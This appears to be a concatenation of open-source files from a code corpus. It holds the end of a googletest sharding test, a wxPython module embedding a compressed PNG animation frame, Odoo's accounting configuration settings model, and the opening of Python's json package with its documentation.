gtest_filter = 'HasDeathTest.*:SeqP/*'
expected_tests = [
'HasDeathTest.Test1',
'HasDeathTest.Test2',
'SeqP/ParamTest.TestX/0',
'SeqP/ParamTest.TestX/1',
'SeqP/ParamTest.TestY/0',
'SeqP/ParamTest.TestY/1',
]
for command in (COMMAND + ' --gtest_death_test_style=threadsafe',
COMMAND + ' --gtest_death_test_style=fast'):
self.RunAndVerifyWithSharding(gtest_filter, 3, expected_tests,
check_exit_0=True, command=command)
self.RunAndVerifyWithSharding(gtest_filter, 5, expected_tests,
check_exit_0=True, command=command)
if __name__ == '__main__':
gtest_test_utils.Main()
| bsd-3-clause |
jorgb/airs | gui/images/anim/progress_1_04.py | 1 | 3301 | #----------------------------------------------------------------------
# This file was generated by D:\personal\src\airs\gui\images\anim\make_images.py
#
from wx import ImageFromStream, BitmapFromImage, EmptyIcon
import cStringIO, zlib
def getData():
return zlib.decompress(
'x\xda\x01\x9f\x03`\xfc\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00$\x00\
\x00\x00$\x08\x02\x00\x00\x00nb\x0f\xcf\x00\x00\x00\x03sBIT\x08\x08\x08\xdb\
\xe1O\xe0\x00\x00\x03WIDATH\x89\xa5\x97m\x93\x9b6\x14\x85\xcf\x95d\x8c]\xdaI\
\xb6\xc9L2\x93v\xf2\xff\xffT\xb2\xf9\xb0\xc9\xecn\x9b\x9d\xd6\xb1\x01K\xf7\
\xf4\x83\x00\x0b,X6\xbd\xc3\xd8\x06#=\xdc\x17\x9d+DU\xb1\xce<er\xc5\tW\x8e\
\xed\xee_\xc3\xf0\x8c\x93^O}\xc1\xaf\x01\xcb\x82g\xb5\xc2+\x00\x18\x81\x99z\
\x05\'W\x97\x9eC\xe6=\xf3\x94:,\x0e\xcb\x91\xe2\xc0\x05^\x06V+\xbcN\x07(3\
\xce\xbd\xd4\xcc5\xa9\x0e\xf0/K\xfcO\xc1")Z\xca\xbb\xf2s\xd6\x96sv\x81y\xca@\
\xcaZ\x8a\xec\xeb\xf3\x05\xa4\x11\xec\xba"\x16\x9c\x9b+\x90U\xb0c@\x9d\x0b\
\xd6\xfa\xe4\xcd\xb9\xf5\xf9\xa8_O]\xc4\xbajl\x15\x00\xc8\x00@\xc4NxN\x80\
\xc5\x82\xcc\x92\x1e[~\xfa\xa1M\xa03x[\x8a\x13:\xc4Z\xefs\x10`,C\x96\xe7\x0c\
\x9c\x0c\xcb\x88\xfd_\x19\xfe\xc1\xe3\xf6\xa8\xdf\xdbN.\xbc\xe2\xa1\xf6\xefw\
\xd6\x01\x97\n\x0c0\xf1\xd3\x01\x1c#K\x1b1S\x0f&>y\xca\x97c\xb8;MU\xe9[\x83\
\xf7;8O\xf1\x9c\xfe\xe7I\'\xd6\x93\x16*b+\xb7\xa4\x0b\x03\xe6\xa1\xf6\xb7\'\
\xfa\x9c\xfc\x9d\x02k\x85\xf3d6\x191\xb0\x01foV\x89\xec\x97c\xb8;\xcd\xde\
\xa6\xc4\xc9\x07\xa3\x84\x02\xca\xcb1\xb1b\x9dL\xdd\x14S1\x9a\xd8\x8f`\\\x9c\
=u=^1=ie\xd3\xaa\x9cl\xad4\xf3\xf2\xdd*\xcd\xdcJ\xd2\xf1\x13<kN\xb8]\xf4\xed\
\x14\xae\x84\xf8\xff[l~C\xec\x93\x1f\xcc\xf73\xaa\x02\x080-\x98\xb6\xe3\x05\
\xf3\x940.\xb4\x94\xa7\xc4\xd6\x88\x03\xe0\x15\x16\xdd\xec\xc3\x9d\xf1\xab\
\xd5g\xfa\xe1`u`\xa3\x1c\x00\xd9B3\xa5E\xc4dC\xea\xc9\xc3:}\xbc\xabC\n\x18\
\x829\x1c\x95\x13\xb3\xa0\xdfq\xa9=\x9d\xf5\xb8\xd8z\x00\xdc7\xfc\xbb\xe5\
\xc2\x1a1\x82\xd2\xc28\xa1\xbbr\xc9\x93i\xc7\xbao\xf4\xe0\x97H\xb7G\xb5"\xf1\
\xb8\xbeA\x89\xcaIi\xe0\x00TV\x1e\x83:\xe9\xb7l\xf13\x19vV\xdc\xd5\xe1W\x8b\
\xd7[;hq\xdc\x14\xdd7\xfaW;\x8a\xb3\x15\t\xe3\xd6\xaa\xc4\xef\x1b \xb6\x98\
\xd2\xca\x85\x14\xad\'\ri\x10\xc8\x93\xe7\x93W\'\xb0\x02\x00\x8d2\xeeVb\x03J\
3\x1b\xfd\x1b\x90[+o\nA\xac:\'\xac\x9c(\xd1\x89\xfa\x98\x145\x81\xa0\xed\'=x\
\x1e<\xcf\n+\x1d\t\xb8\xfcH\x91VD\x89\xb7[\xd9X\x83\xa1\xc4+\'\x85\x91tI\xa5\
\xa4h\xa1o]Vd\xe5\xb6.\x90\x95\x93\x0f\xbb\xaeU\x99\xfe\xb9xS\xc8\x10\xb4\
\xc9*a\xd2\xc6\x94\xddi\xe4\xd9\xe7\xa8\x7f\xee\xed\xb0L/\x85\xb8\xb7\xb8)L*\
\xfc\x8b{\xe2\x8cM"\x19\xc8\x8f\xbf\xd8W\x9b\xcb\x95Q\xd5\xbf\xda\xe0\xb7\
\x8d\x84q\x00\xa3\x1f!\xd7\xfe\xa3\xa5\xce\xb9>\x8b\x81\xfc\xb0\xb3\xef\xb6\
\xa3Q\x99\x17\x8b\xa73\x1e\x1a%(\x90\x08KI\xda\xd7Kz\x9a\xc6 \x96\xe5\x1f{3!\
\xe5a\x00\x0e\x1e\xf7\x8d6\n\xdb\x87{\xe0\r9\xcb\xc2<\xb1\xb3\xf8\xb8\xb7UN\
\xe1g_\x99<\xe5\xb1\xd5\x7f\xce\x1a\x88I\x95fa\x9e\xd8\x1a\xdc\x14\xe6]i\xe6\
\x84{\xe9\xfd,"\xff=\xfb\xefgi\xb4\xc3L\n5\x10V\xb01\xf2\xba\x907\xc5,f\x15l\
\xb0\xfe\xed&\xaa\x06\xa3|;\x83\xd2HiQ\xae\xeb\xc1\xff\x01~\xff\x10pu~\xc8#\
\x00\x00\x00\x00IEND\xaeB`\x82\xdbm\xc0z' )
def getBitmap():
return BitmapFromImage(getImage())
def getImage():
stream = cStringIO.StringIO(getData())
return ImageFromStream(stream)
| gpl-2.0 |
xujb/odoo | addons/account/res_config.py | 200 | 25453 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import SUPERUSER_ID
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DF
from openerp.tools.translate import _
from openerp.osv import fields, osv
class account_config_settings(osv.osv_memory):
_name = 'account.config.settings'
_inherit = 'res.config.settings'
_columns = {
'company_id': fields.many2one('res.company', 'Company', required=True),
'has_default_company': fields.boolean('Has default company', readonly=True),
'expects_chart_of_accounts': fields.related('company_id', 'expects_chart_of_accounts', type='boolean',
string='This company has its own chart of accounts',
help="""Check this box if this company is a legal entity."""),
'currency_id': fields.related('company_id', 'currency_id', type='many2one', relation='res.currency', required=True,
string='Default company currency', help="Main currency of the company."),
'paypal_account': fields.related('company_id', 'paypal_account', type='char', size=128,
string='Paypal account', help="Paypal account (email) for receiving online payments (credit card, etc.) If you set a paypal account, the customer will be able to pay your invoices or quotations with a button \"Pay with Paypal\" in automated emails or through the Odoo portal."),
'company_footer': fields.related('company_id', 'rml_footer', type='text', readonly=True,
string='Bank accounts footer preview', help="Bank accounts as printed in the footer of each printed document"),
'has_chart_of_accounts': fields.boolean('Company has a chart of accounts'),
'chart_template_id': fields.many2one('account.chart.template', 'Template', domain="[('visible','=', True)]"),
'code_digits': fields.integer('# of Digits', help="No. of digits to use for account code"),
'tax_calculation_rounding_method': fields.related('company_id',
'tax_calculation_rounding_method', type='selection', selection=[
('round_per_line', 'Round per line'),
('round_globally', 'Round globally'),
], string='Tax calculation rounding method',
help="If you select 'Round per line' : for each tax, the tax amount will first be computed and rounded for each PO/SO/invoice line and then these rounded amounts will be summed, leading to the total amount for that tax. If you select 'Round globally': for each tax, the tax amount will be computed for each PO/SO/invoice line, then these amounts will be summed and eventually this total tax amount will be rounded. If you sell with tax included, you should choose 'Round per line' because you certainly want the sum of your tax-included line subtotals to be equal to the total amount with taxes."),
'sale_tax': fields.many2one("account.tax.template", "Default sale tax"),
'purchase_tax': fields.many2one("account.tax.template", "Default purchase tax"),
'sale_tax_rate': fields.float('Sales tax (%)'),
'purchase_tax_rate': fields.float('Purchase tax (%)'),
'complete_tax_set': fields.boolean('Complete set of taxes', help='This boolean helps you to choose if you want to propose to the user to encode the sales and purchase rates or use the usual m2o fields. This last choice assumes that the set of tax defined for the chosen template is complete'),
'has_fiscal_year': fields.boolean('Company has a fiscal year'),
'date_start': fields.date('Start date', required=True),
'date_stop': fields.date('End date', required=True),
'period': fields.selection([('month', 'Monthly'), ('3months','3 Monthly')], 'Periods', required=True),
'sale_journal_id': fields.many2one('account.journal', 'Sale journal'),
'sale_sequence_prefix': fields.related('sale_journal_id', 'sequence_id', 'prefix', type='char', string='Invoice sequence'),
'sale_sequence_next': fields.related('sale_journal_id', 'sequence_id', 'number_next', type='integer', string='Next invoice number'),
'sale_refund_journal_id': fields.many2one('account.journal', 'Sale refund journal'),
'sale_refund_sequence_prefix': fields.related('sale_refund_journal_id', 'sequence_id', 'prefix', type='char', string='Credit note sequence'),
'sale_refund_sequence_next': fields.related('sale_refund_journal_id', 'sequence_id', 'number_next', type='integer', string='Next credit note number'),
'purchase_journal_id': fields.many2one('account.journal', 'Purchase journal'),
'purchase_sequence_prefix': fields.related('purchase_journal_id', 'sequence_id', 'prefix', type='char', string='Supplier invoice sequence'),
'purchase_sequence_next': fields.related('purchase_journal_id', 'sequence_id', 'number_next', type='integer', string='Next supplier invoice number'),
'purchase_refund_journal_id': fields.many2one('account.journal', 'Purchase refund journal'),
'purchase_refund_sequence_prefix': fields.related('purchase_refund_journal_id', 'sequence_id', 'prefix', type='char', string='Supplier credit note sequence'),
'purchase_refund_sequence_next': fields.related('purchase_refund_journal_id', 'sequence_id', 'number_next', type='integer', string='Next supplier credit note number'),
'module_account_check_writing': fields.boolean('Pay your suppliers by check',
help='This allows you to check writing and printing.\n'
'-This installs the module account_check_writing.'),
'module_account_accountant': fields.boolean('Full accounting features: journals, legal statements, chart of accounts, etc.',
help="""If you do not check this box, you will be able to do invoicing & payments, but not accounting (Journal Items, Chart of Accounts, ...)"""),
'module_account_asset': fields.boolean('Assets management',
help='This allows you to manage the assets owned by a company or a person.\n'
'It keeps track of the depreciation occurred on those assets, and creates account move for those depreciation lines.\n'
'-This installs the module account_asset. If you do not check this box, you will be able to do invoicing & payments, '
'but not accounting (Journal Items, Chart of Accounts, ...)'),
'module_account_budget': fields.boolean('Budget management',
help='This allows accountants to manage analytic and crossovered budgets. '
'Once the master budgets and the budgets are defined, '
'the project managers can set the planned amount on each analytic account.\n'
'-This installs the module account_budget.'),
'module_account_payment': fields.boolean('Manage payment orders',
help='This allows you to create and manage your payment orders, with purposes to \n'
'* serve as base for an easy plug-in of various automated payment mechanisms, and \n'
'* provide a more efficient way to manage invoice payments.\n'
'-This installs the module account_payment.' ),
'module_account_voucher': fields.boolean('Manage customer payments',
help='This includes all the basic requirements of voucher entries for bank, cash, sales, purchase, expense, contra, etc.\n'
'-This installs the module account_voucher.'),
'module_account_followup': fields.boolean('Manage customer payment follow-ups',
help='This allows to automate letters for unpaid invoices, with multi-level recalls.\n'
'-This installs the module account_followup.'),
'module_product_email_template': fields.boolean('Send products tools and information at the invoice confirmation',
help='With this module, link your products to a template to send complete information and tools to your customer.\n'
'For instance when invoicing a training, the training agenda and materials will automatically be send to your customers.'),
'group_proforma_invoices': fields.boolean('Allow pro-forma invoices',
implied_group='account.group_proforma_invoices',
help="Allows you to put invoices in pro-forma state."),
'default_sale_tax': fields.many2one('account.tax', 'Default sale tax',
help="This sale tax will be assigned by default on new products."),
'default_purchase_tax': fields.many2one('account.tax', 'Default purchase tax',
help="This purchase tax will be assigned by default on new products."),
'decimal_precision': fields.integer('Decimal precision on journal entries',
help="""As an example, a decimal precision of 2 will allow journal entries like: 9.99 EUR, whereas a decimal precision of 4 will allow journal entries like: 0.0231 EUR."""),
'group_multi_currency': fields.boolean('Allow multi currencies',
implied_group='base.group_multi_currency',
help="Allows you multi currency environment"),
'group_analytic_accounting': fields.boolean('Analytic accounting',
implied_group='analytic.group_analytic_accounting',
help="Allows you to use the analytic accounting."),
'group_check_supplier_invoice_total': fields.boolean('Check the total of supplier invoices',
implied_group="account.group_supplier_inv_check_total"),
'income_currency_exchange_account_id': fields.related(
'company_id', 'income_currency_exchange_account_id',
type='many2one',
relation='account.account',
string="Gain Exchange Rate Account",
domain="[('type', '=', 'other'), ('company_id', '=', company_id)]]"),
'expense_currency_exchange_account_id': fields.related(
'company_id', 'expense_currency_exchange_account_id',
type="many2one",
relation='account.account',
string="Loss Exchange Rate Account",
domain="[('type', '=', 'other'), ('company_id', '=', company_id)]]"),
}
def _check_account_gain(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
if obj.income_currency_exchange_account_id.company_id and obj.company_id != obj.income_currency_exchange_account_id.company_id:
return False
return True
def _check_account_loss(self, cr, uid, ids, context=None):
for obj in self.browse(cr, uid, ids, context=context):
if obj.expense_currency_exchange_account_id.company_id and obj.company_id != obj.expense_currency_exchange_account_id.company_id:
return False
return True
_constraints = [
(_check_account_gain, 'The company of the gain exchange rate account must be the same than the company selected.', ['income_currency_exchange_account_id']),
(_check_account_loss, 'The company of the loss exchange rate account must be the same than the company selected.', ['expense_currency_exchange_account_id']),
]
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.id
def _default_has_default_company(self, cr, uid, context=None):
count = self.pool.get('res.company').search_count(cr, uid, [], context=context)
return bool(count == 1)
def _get_default_fiscalyear_data(self, cr, uid, company_id, context=None):
"""Compute default period, starting and ending date for fiscalyear
- if in a fiscal year, use its period, starting and ending date
- if past fiscal year, use its period, and new dates [ending date of the latest +1 day ; ending date of the latest +1 year]
- if no fiscal year, use monthly, 1st jan, 31th dec of this year
:return: (date_start, date_stop, period) at format DEFAULT_SERVER_DATETIME_FORMAT
"""
fiscalyear_ids = self.pool.get('account.fiscalyear').search(cr, uid,
[('date_start', '<=', time.strftime(DF)), ('date_stop', '>=', time.strftime(DF)),
('company_id', '=', company_id)])
if fiscalyear_ids:
# is in a current fiscal year, use this one
fiscalyear = self.pool.get('account.fiscalyear').browse(cr, uid, fiscalyear_ids[0], context=context)
if len(fiscalyear.period_ids) == 5: # 4 periods of 3 months + opening period
period = '3months'
else:
period = 'month'
return (fiscalyear.date_start, fiscalyear.date_stop, period)
else:
past_fiscalyear_ids = self.pool.get('account.fiscalyear').search(cr, uid,
[('date_stop', '<=', time.strftime(DF)), ('company_id', '=', company_id)])
if past_fiscalyear_ids:
# use the latest fiscal, sorted by (start_date, id)
latest_year = self.pool.get('account.fiscalyear').browse(cr, uid, past_fiscalyear_ids[-1], context=context)
latest_stop = datetime.datetime.strptime(latest_year.date_stop, DF)
if len(latest_year.period_ids) == 5:
period = '3months'
else:
period = 'month'
return ((latest_stop+datetime.timedelta(days=1)).strftime(DF), latest_stop.replace(year=latest_stop.year+1).strftime(DF), period)
else:
return (time.strftime('%Y-01-01'), time.strftime('%Y-12-31'), 'month')
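# Worked example (ours, not in the original source): run on 2014-07-01
# with no fiscal year defined at all, the fallback branch returns
# ('2014-01-01', '2014-12-31', 'month'); if instead the latest past
# fiscal year ended on 2013-12-31 with monthly periods, the result is
# the same dates shifted from that year, still with period 'month'.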
_defaults = {
'company_id': _default_company,
'has_default_company': _default_has_default_company,
}
def create(self, cr, uid, values, context=None):
id = super(account_config_settings, self).create(cr, uid, values, context)
# Hack: to avoid some nasty bug, related fields are not written upon record creation.
# Hence we write on those fields here.
vals = {}
for fname, field in self._columns.iteritems():
if isinstance(field, fields.related) and fname in values:
vals[fname] = values[fname]
self.write(cr, uid, [id], vals, context)
return id
def onchange_company_id(self, cr, uid, ids, company_id, context=None):
# update related fields
values = {}
values['currency_id'] = False
if company_id:
company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)
has_chart_of_accounts = company_id not in self.pool.get('account.installer').get_unconfigured_cmp(cr, uid)
fiscalyear_count = self.pool.get('account.fiscalyear').search_count(cr, uid,
[('date_start', '<=', time.strftime('%Y-%m-%d')), ('date_stop', '>=', time.strftime('%Y-%m-%d')),
('company_id', '=', company_id)])
date_start, date_stop, period = self._get_default_fiscalyear_data(cr, uid, company_id, context=context)
values = {
'expects_chart_of_accounts': company.expects_chart_of_accounts,
'currency_id': company.currency_id.id,
'paypal_account': company.paypal_account,
'company_footer': company.rml_footer,
'has_chart_of_accounts': has_chart_of_accounts,
'has_fiscal_year': bool(fiscalyear_count),
'chart_template_id': False,
'tax_calculation_rounding_method': company.tax_calculation_rounding_method,
'date_start': date_start,
'date_stop': date_stop,
'period': period,
}
# update journals and sequences
for journal_type in ('sale', 'sale_refund', 'purchase', 'purchase_refund'):
for suffix in ('_journal_id', '_sequence_prefix', '_sequence_next'):
values[journal_type + suffix] = False
journal_obj = self.pool.get('account.journal')
journal_ids = journal_obj.search(cr, uid, [('company_id', '=', company_id)])
for journal in journal_obj.browse(cr, uid, journal_ids):
if journal.type in ('sale', 'sale_refund', 'purchase', 'purchase_refund'):
values.update({
journal.type + '_journal_id': journal.id,
journal.type + '_sequence_prefix': journal.sequence_id.prefix,
journal.type + '_sequence_next': journal.sequence_id.number_next,
})
# update taxes
ir_values = self.pool.get('ir.values')
taxes_id = ir_values.get_default(cr, uid, 'product.template', 'taxes_id', company_id=company_id)
supplier_taxes_id = ir_values.get_default(cr, uid, 'product.template', 'supplier_taxes_id', company_id=company_id)
values.update({
'default_sale_tax': isinstance(taxes_id, list) and taxes_id[0] or taxes_id,
'default_purchase_tax': isinstance(supplier_taxes_id, list) and supplier_taxes_id[0] or supplier_taxes_id,
})
# update gain/loss exchange rate accounts
values.update({
'income_currency_exchange_account_id': company.income_currency_exchange_account_id and company.income_currency_exchange_account_id.id or False,
'expense_currency_exchange_account_id': company.expense_currency_exchange_account_id and company.expense_currency_exchange_account_id.id or False
})
return {'value': values}
def onchange_chart_template_id(self, cr, uid, ids, chart_template_id, context=None):
tax_templ_obj = self.pool.get('account.tax.template')
res = {'value': {
'complete_tax_set': False, 'sale_tax': False, 'purchase_tax': False,
'sale_tax_rate': 15, 'purchase_tax_rate': 15,
}}
if chart_template_id:
# update complete_tax_set, sale_tax and purchase_tax
chart_template = self.pool.get('account.chart.template').browse(cr, uid, chart_template_id, context=context)
res['value'].update({'complete_tax_set': chart_template.complete_tax_set})
if chart_template.complete_tax_set:
# the default tax is given by the lowest sequence; for equal sequences we take the latest created, as is the case for taxes created while installing the generic chart of accounts
sale_tax_ids = tax_templ_obj.search(cr, uid,
[("chart_template_id", "=", chart_template_id), ('type_tax_use', 'in', ('sale','all'))],
order="sequence, id desc")
purchase_tax_ids = tax_templ_obj.search(cr, uid,
[("chart_template_id", "=", chart_template_id), ('type_tax_use', 'in', ('purchase','all'))],
order="sequence, id desc")
res['value']['sale_tax'] = sale_tax_ids and sale_tax_ids[0] or False
res['value']['purchase_tax'] = purchase_tax_ids and purchase_tax_ids[0] or False
if chart_template.code_digits:
res['value']['code_digits'] = chart_template.code_digits
return res
def onchange_tax_rate(self, cr, uid, ids, rate, context=None):
return {'value': {'purchase_tax_rate': rate or False}}
def onchange_multi_currency(self, cr, uid, ids, group_multi_currency, context=None):
res = {}
if not group_multi_currency:
res['value'] = {'income_currency_exchange_account_id': False, 'expense_currency_exchange_account_id': False}
return res
def onchange_start_date(self, cr, uid, id, start_date):
if start_date:
start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d")
end_date = (start_date + relativedelta(months=12)) - relativedelta(days=1)
return {'value': {'date_stop': end_date.strftime('%Y-%m-%d')}}
return {}
def open_company_form(self, cr, uid, ids, context=None):
config = self.browse(cr, uid, ids[0], context)
return {
'type': 'ir.actions.act_window',
'name': 'Configure your Company',
'res_model': 'res.company',
'res_id': config.company_id.id,
'view_mode': 'form',
}
def set_default_taxes(self, cr, uid, ids, context=None):
""" set default sale and purchase taxes for products """
if uid != SUPERUSER_ID and not self.pool['res.users'].has_group(cr, uid, 'base.group_erp_manager'):
raise openerp.exceptions.AccessError(_("Only administrators can change the settings"))
ir_values = self.pool.get('ir.values')
config = self.browse(cr, uid, ids[0], context)
ir_values.set_default(cr, SUPERUSER_ID, 'product.template', 'taxes_id',
config.default_sale_tax and [config.default_sale_tax.id] or False, company_id=config.company_id.id)
ir_values.set_default(cr, SUPERUSER_ID, 'product.template', 'supplier_taxes_id',
config.default_purchase_tax and [config.default_purchase_tax.id] or False, company_id=config.company_id.id)
def set_chart_of_accounts(self, cr, uid, ids, context=None):
""" install a chart of accounts for the given company (if required) """
config = self.browse(cr, uid, ids[0], context)
if config.chart_template_id:
assert config.expects_chart_of_accounts and not config.has_chart_of_accounts
wizard = self.pool.get('wizard.multi.charts.accounts')
wizard_id = wizard.create(cr, uid, {
'company_id': config.company_id.id,
'chart_template_id': config.chart_template_id.id,
'code_digits': config.code_digits or 6,
'sale_tax': config.sale_tax.id,
'purchase_tax': config.purchase_tax.id,
'sale_tax_rate': config.sale_tax_rate,
'purchase_tax_rate': config.purchase_tax_rate,
'complete_tax_set': config.complete_tax_set,
'currency_id': config.currency_id.id,
}, context)
wizard.execute(cr, uid, [wizard_id], context)
def set_fiscalyear(self, cr, uid, ids, context=None):
""" create a fiscal year for the given company (if necessary) """
config = self.browse(cr, uid, ids[0], context)
if config.has_chart_of_accounts or config.chart_template_id:
fiscalyear = self.pool.get('account.fiscalyear')
fiscalyear_count = fiscalyear.search_count(cr, uid,
[('date_start', '<=', config.date_start), ('date_stop', '>=', config.date_stop),
('company_id', '=', config.company_id.id)],
context=context)
if not fiscalyear_count:
name = code = config.date_start[:4]
if int(name) != int(config.date_stop[:4]):
name = config.date_start[:4] +'-'+ config.date_stop[:4]
code = config.date_start[2:4] +'-'+ config.date_stop[2:4]
vals = {
'name': name,
'code': code,
'date_start': config.date_start,
'date_stop': config.date_stop,
'company_id': config.company_id.id,
}
fiscalyear_id = fiscalyear.create(cr, uid, vals, context=context)
if config.period == 'month':
fiscalyear.create_period(cr, uid, [fiscalyear_id])
elif config.period == '3months':
fiscalyear.create_period3(cr, uid, [fiscalyear_id])
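    # Example (illustrative, not in the original source): a fiscal year kept
    # inside one calendar year gets name == code == '2014', while one running
    # 2014-07-01..2015-06-30 gets name '2014-2015' and code '14-15'.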
def get_default_dp(self, cr, uid, fields, context=None):
dp = self.pool.get('ir.model.data').get_object(cr, uid, 'product','decimal_account')
return {'decimal_precision': dp.digits}
def set_default_dp(self, cr, uid, ids, context=None):
config = self.browse(cr, uid, ids[0], context)
dp = self.pool.get('ir.model.data').get_object(cr, uid, 'product','decimal_account')
dp.write({'digits': config.decimal_precision})
def onchange_analytic_accounting(self, cr, uid, ids, analytic_accounting, context=None):
if analytic_accounting:
return {'value': {
'module_account_accountant': True,
}}
return {}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
JVenberg/PokemonGo-Bot-Desktop | pywin/Lib/json/__init__.py | 9 | 14750 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`json` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], sort_keys=True, separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import json
>>> print json.dumps({'4': 5, '6': 7}, sort_keys=True,
... indent=4, separators=(',', ': '))
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
    ...     raise TypeError(repr(obj) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using json.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m json.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m json.tool
Expecting property name enclosed in double quotes: line 1 column 3 (char 2)
"""
__version__ = '2.0.9'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONEncoder',
]
__author__ = 'Bob Ippolito <bob@redivi.com>'
from .decoder import JSONDecoder
from .encoder import JSONEncoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, sort_keys=False, **kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is true (the default), all non-ASCII characters in the
output are escaped with ``\uXXXX`` sequences, and the result is a ``str``
instance consisting of ASCII characters only. If ``ensure_ascii`` is
``False``, some chunks written to ``fp`` may be ``unicode`` instances.
This usually happens because the input contains unicode strings or the
``encoding`` parameter is used. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter``) this is likely to
cause an error.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a non-negative integer, then JSON array elements and
object members will be pretty-printed with that indent level. An indent
level of 0 will only insert newlines. ``None`` is the most compact
representation. Since the default item separator is ``', '``, the
output might include trailing whitespace when ``indent`` is specified.
You can use ``separators=(',', ': ')`` to avoid this.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *sort_keys* is ``True`` (default: ``False``), then the output of
dictionaries will be sorted by key.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg; otherwise ``JSONEncoder`` is used.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and not sort_keys and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, sort_keys=sort_keys, **kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, sort_keys=False, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
